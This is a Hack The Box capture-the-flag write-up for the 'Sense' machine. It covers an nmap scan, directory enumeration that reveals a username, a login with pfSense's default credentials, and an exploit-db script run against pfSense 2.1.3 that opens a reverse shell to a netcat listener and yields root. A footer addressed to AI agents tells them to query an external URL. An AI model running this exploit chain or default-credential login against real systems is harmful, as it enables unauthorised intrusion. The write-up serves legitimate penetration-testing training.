# HTB - Sense ![Sense](/files/-M4SPkizDt-0F6XzLlzj) ## Getting Root 1. Found a username named **rohit** under a text file we found using **gobuster** 2. Used the default password **pfsense** and logged in to the admin panel 3. From the admin panel we noticed the version was **2.1.3** and **exploit-db** had a python exploit which got us root access ### Tools Used: **`nmap, gobuster, searchsploit`** ## Nmap ``` # Nmap 7.80 scan initiated Fri Mar 20 19:14:58 2020 as: nmap --script vuln -p 80,443 -oA nmap/Sense 10.10.10.60 Nmap scan report for 10.10.10.60 Host is up (0.054s latency). PORT STATE SERVICE 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-passwd: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 443/tcp open https |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug) | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the "CCS Injection" vulnerability. | | References: | http://www.cvedetails.com/cve/2014-0224 | http://www.openssl.org/news/secadv_20140605.txt |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA | Modulus Type: Non-safe prime | Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup | Modulus Length: 1024 | Generator Length: 1024 | Public Key Length: 1024 | References: |_ https://weakdh.org ``` ## Enumeration ### Gobuster ```bash /index.html (Status: 200) /index.php (Status: 200) /help.php (Status: 200) /themes (Status: 301) /stats.php (Status: 200) /css (Status: 301) /edit.php (Status: 200) /includes (Status: 301) /license.php (Status: 200) /status.php (Status: 200) /system.php (Status: 200) /javascript (Status: 301) '/changelog.txt (Status: 200)' /classes (Status: 301) /exec.php (Status: 200) /widgets (Status: 301) /graph.php (Status: 200) /tree (Status: 301) /wizard.php (Status: 200) /shortcuts (Status: 301) /pkg.php (Status: 200) /installer (Status: 301) /wizards (Status: 301) /xmlrpc.php (Status: 200) /reboot.php (Status: 200) /interfaces.php (Status: 200) /csrf (Status: 301) '/system-users.txt (Status: 200)' /filebrowser (Status: 301) /%7Echeckout%7E (Status: 403) ``` Checking **`/changelog.txt`** ![](/files/-M4STOiU9mbUMyrO0k3f) Checking **`/system-users.txt`** ![](/files/-M4SThGQPzYHFe002JwV) We got username: **rohit** and a simple google search on pfsense default username and password shows that the default password is **pfsense** We can successfully login and notice that the **pfsense** version is **2.1.3** ![](/files/-M4SUErkH9K4X6tqCGSQ) Using searchsploit we find **`exploits/php/webapps/43560.py`** ![](/files/-M4SUg-bjv0k3cKona-M) ## Privilege Escalation Running the exploit ```bash # python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.55 --lport 9001 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed ``` We get a shell as root ```bash # rlwrap nc -lnvp 9001 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.60. Ncat: Connection from 10.10.10.60:60055. sh: can't access tty; job control turned off # id uid=0(root) gid=0(wheel) groups=0(wheel) # ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-sense.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.